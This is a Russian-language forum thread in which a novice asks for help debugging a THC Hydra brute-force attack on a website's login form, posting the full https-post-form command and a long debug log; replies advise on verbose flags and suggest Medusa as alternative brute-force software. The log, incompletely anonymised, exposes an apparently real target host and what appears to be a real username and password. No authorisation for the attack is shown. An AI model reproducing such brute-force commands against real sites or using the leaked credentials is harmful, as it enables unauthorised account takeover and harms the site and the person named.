• B правой части каждого сообщения есть стрелки и . Не стесняйтесь оценивать ответы. Чтобы автору вопроса закрыть свой тикет, надо выбрать лучший ответ. Просто нажмите значок в правой части сообщения.

Help: ошибка брутфорса в Hydra!


Ребят, помогите зеленому. В обзщем, при брутфорсе одного сайта вылезла сей прекрасная ошибка:
Child with pid 7465 terminating, cannot connect
[ERROR] Child with pid 7466 terminating, cannot connect
[ERROR] Child with pid 7467 terminating, cannot connect
[ERROR] Child with pid 7468 terminating, cannot connect
1 of 1 target completed, 0 valid passwords found

Погуглив, ничего не нашел полезного, может, кто-то сталкивался?

Сам запрос:
hydra -O -l name -p pass https-post-form://sitename.ru:443 -m "/:authUserLogin=^USER^&authUserPass=^PASS^:Отказано в доступе"
Ребят, помогите зеленому. В обзщем, при брутфорсе одного сайта вылезла сей прекрасная ошибка:

Child with pid 7465 terminating, cannot connect
[ERROR] Child with pid 7466 terminating, cannot connect
[ERROR] Child with pid 7467 terminating, cannot connect
[ERROR] Child with pid 7468 terminating, cannot connect
1 of 1 target completed, 0 valid passwords found

Погуглив, ничего не нашел полезного, может, кто-то сталкивался?

Сам запрос:

hydra -O -l name -p pass https-post-form://sitename.ru:443 -m "/:authUserLogin=^USER^&authUserPass=^PASS^:Отказано в доступе"
Пропиши в команде -v и -d для большей информации
Пропиши в команде -v и -d для большей информации
Hydra v8.8 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

[DEBUG] Output color flag is 1
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2019-05-16 07:59:08
[DEBUG] cmdline: hydra -O -v -d -l name -p pass -m /:authUserLogin=^USER^&authUserPass=^PASS^:Отказано в доступе https-post-form://example.ru:443
[DEBUG] opt:10 argc:11 mod:https-post-form tgt:example.ru port:443 misc:/:authUserLogin=^USER^&authUserPass=^PASS^:Отказано в доступе
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 1 task per 1 server, overall 1 task, 1 login try (l:1/p:1), ~1 try per task
[DATA] attacking http-post-forms://example.ru:443/:authUserLogin=^USER^&authUserPass=^PASS^:Отказано в доступе
[VERBOSE] Resolving addresses ...
[DEBUG] resolving example.ru
[VERBOSE] resolving done
[DEBUG] Code: attack   Time: 1557993558
[DEBUG] Options: mode 0  ssl 1  restore 0  showAttempt 0  tasks 1  max_use 1 tnp 0  tpsal 0  tprl 0  exit_found 0  miscptr /:authUserLogin=^USER^&authUserPass=^PASS^:Отказано в доступе  service http-post-form
[DEBUG] Brains: active 0  targets 1  finished 0  todo_all 1  todo 1  sent 0  found 0  countlogin 1  sizelogin 11  countpass 1  sizepass 5
[DEBUG] Target 0 - target example.ru  ip  login_no 0  pass_no 0  sent 0  pass_state 0  redo_state 0 (0 redos)  use_count 0  failed 0  done 0  fail_count 0  login_ptr name  pass_ptr pass
[DEBUG] Task 0 - pid 0  active 0  redo 0  current_login_ptr (null)  current_pass_ptr (null)
[DEBUG] Tasks 1 inactive  0 active
[DEBUG] child 0 got target 0 selected
[DEBUG] child 0 spawned for target 0 with pid 3354
[DEBUG] head_no 0 has pid 3354
[DEBUG] head_no[0] read n
[DEBUG] send_next_pair_init target 0, head 0, redo 0, redo_state 0, pass_state 0. loop_mode 0, curlogin (null), curpass (null), tlogin name, tpass pass, logincnt 0/1, passcnt 0/1, loop_cnt 1
[DEBUG] send_next_pair_mid done 1, pass_state 0, clogin name, cpass pass, tlogin -p, tpass pass, redo 0
[ATTEMPT] target example.ru - login "name" - pass "pass" - 1 of 1 [child 0] (0/0)
[VERBOSE] Could not create an SSL session: error:1425F102:SSL routines:ssl_choose_client_version:unsupported protocol
[ERROR] Child with pid 3354 terminating, cannot connect
[DEBUG] pid 3354 called child_exit with code 1
[DEBUG] head_no[0] read C
[ATTEMPT-ERROR] target example.ru - login "name" - pass "pass" - child 0 - 1 of 1
[DEBUG] hydra_increase_fail_count: 1 >= 0 => disable
[DEBUG] - will be retried at the end: ip example.ru - login name - pass pass - child 0
[DEBUG] head_no 0, kill 1, fail 0
[DEBUG] child 0 got target 0 selected
[DEBUG] child 0 spawned for target 0 with pid 3355
[DEBUG] head_no 0 has pid 3355
[DEBUG] head_no[0] read n
[DEBUG] send_next_pair_init target 0, head 0, redo 1, redo_state 0, pass_state 0. loop_mode 0, curlogin , curpass , tlogin -p, tpass a480, logincnt 1/1, passcnt 0/1, loop_cnt 1
[COMPLETED] target example.ru - login "" - pass "" - child 0 - 1 of 2
[DEBUG] send_next_pair_mid done 0, pass_state 0, clogin , cpass , tlogin -p, tpass pass, redo 1
[DEBUG] Entering redo_state
[DEBUG] send_next_pair_init target 0, head 0, redo 1, redo_state 1, pass_state 0. loop_mode 0, curlogin , curpass , tlogin -p, tpass a480, logincnt 1/1, passcnt 0/1, loop_cnt 2
[COMPLETED] target example.ru - login "" - pass "" - child 0 - 1 of 2
[DEBUG] send_next_pair_mid done 1, pass_state 0, clogin name, cpass pass, tlogin -p, tpass pass, redo 1
[REDO-ATTEMPT] target example.ru - login "name" - pass "pass" - 2 of 2 [child 0] (1/1)
[VERBOSE] Could not create an SSL session: error:1425F102:SSL routines:ssl_choose_client_version:unsupported protocol
[ERROR] Child with pid 3355 terminating, cannot connect
[DEBUG] pid 3355 called child_exit with code 1
[DEBUG] head_no[0] read C
[ATTEMPT-ERROR] target example.ru - login "name" - pass "pass" - child 0 - 2 of 1
[DEBUG] hydra_increase_fail_count: 2 >= 0 => disable
[DEBUG] - will be retried at the end: ip ks.rsmu.ru - login makarov_pa - pass a480 - child 0
[DEBUG] head_no 0, kill 1, fail 0
[DEBUG] child 0 got target 0 selected
[DEBUG] child 0 spawned for target 0 with pid 3356
[DEBUG] head_no 0 has pid 3356
[DEBUG] head_no[0] read n
[DEBUG] send_next_pair_init target 0, head 0, redo 2, redo_state 2, pass_state 0. loop_mode 0, curlogin , curpass , tlogin -p, tpass a480, logincnt 1/1, passcnt 0/1, loop_cnt 1
[COMPLETED] target example.ru - login "" - pass "" - child 0 - 2 of 3
[DEBUG] send_next_pair_mid done 1, pass_state 0, clogin makarov_pa, cpass a480, tlogin -p, tpass a480, redo 2
[REDO-ATTEMPT] target example.ru - login "name" - pass "pass" - 3 of 3 [child 0] (2/2)
[VERBOSE] Could not create an SSL session: error:1425F102:SSL routines:ssl_choose_client_version:unsupported protocol
[ERROR] Child with pid 3356 terminating, cannot connect
[DEBUG] pid 3356 called child_exit with code 1
[DEBUG] head_no[0] read C
[ATTEMPT-ERROR] target example.ru - login "name" - pass "pass" - child 0 - 3 of 1
[DEBUG] hydra_increase_fail_count: 3 >= 0 => disable
[DEBUG] - will be retried at the end: ip example.ru - login name - pass pass - child 0
[DEBUG] head_no 0, kill 1, fail 0
[DEBUG] child 0 got target 0 selected
[DEBUG] child 0 spawned for target 0 with pid 3358
[DEBUG] head_no 0 has pid 3358
[DEBUG] head_no[0] read n
[DEBUG] send_next_pair_init target 0, head 0, redo 3, redo_state 3, pass_state 0. loop_mode 0, curlogin , curpass , tlogin -p, tpass a480, logincnt 1/1, passcnt 0/1, loop_cnt 1
[COMPLETED] target ks.rsmu.ru - login "" - pass "" - child 0 - 3 of 4
[DEBUG] send_next_pair_mid done 1, pass_state 0, clogin makarov_pa, cpass a480, tlogin -p, tpass a480, redo 3
[REDO-ATTEMPT] target ks.rsmu.ru - login "name" - pass "pass" - 4 of 4 [child 0] (3/3)
[VERBOSE] Could not create an SSL session: error:1425F102:SSL routines:ssl_choose_client_version:unsupported protocol
[ERROR] Child with pid 3358 terminating, cannot connect
[DEBUG] pid 3358 called child_exit with code 1
[DEBUG] head_no[0] read C
[ATTEMPT-ERROR] target ks.rsmu.ru - login "name" - pass "pass" - child 0 - 4 of 1
[DEBUG] hydra_increase_fail_count: 4 >= 0 => disable
[DEBUG] head_no 0, kill 1, fail 0
[DEBUG] child 0 got target 0 selected
[DEBUG] child 0 spawned for target 0 with pid 3359
[DEBUG] head_no 0 has pid 3359
[DEBUG] head_no[0] read n
[STATUS] attack finished for example.ru (waiting for children to complete tests)
[DEBUG] head_no 0, kill 1, fail 0
[DEBUG] all targets done and all heads finished
[DEBUG] while loop left with 1
1 of 1 target completed, 0 valid passwords found
[DEBUG] killing all remaining children now that might be stuck
В примере вышел я исправил же адрес нужного сайта на example и логин с паролем.
Не подскажете аналогичной софт для брута, если знаете?
Я про то что скорее всего вы не нашли параметры Login и Password.

А по поводу подобного софта. Еще Medusa есть)
Could not create an SSL session: error:1425F102:SSL routines:ssl_choose_client_version:unsupported protocol

И адрес не во всем листинге Вы исправили
Could not create an SSL session: error:1425F102:SSL routines:ssl_choose_client_version:unsupported protocol

И адрес не во всем листинге Вы исправили
И правда, не во всем :D
А как вообще интерпретироваться эту строчку, не подскажете?
>Could not create an SSL session: error:1425F102:SSL routines:ssl_choose_client_version:unsupported protocol
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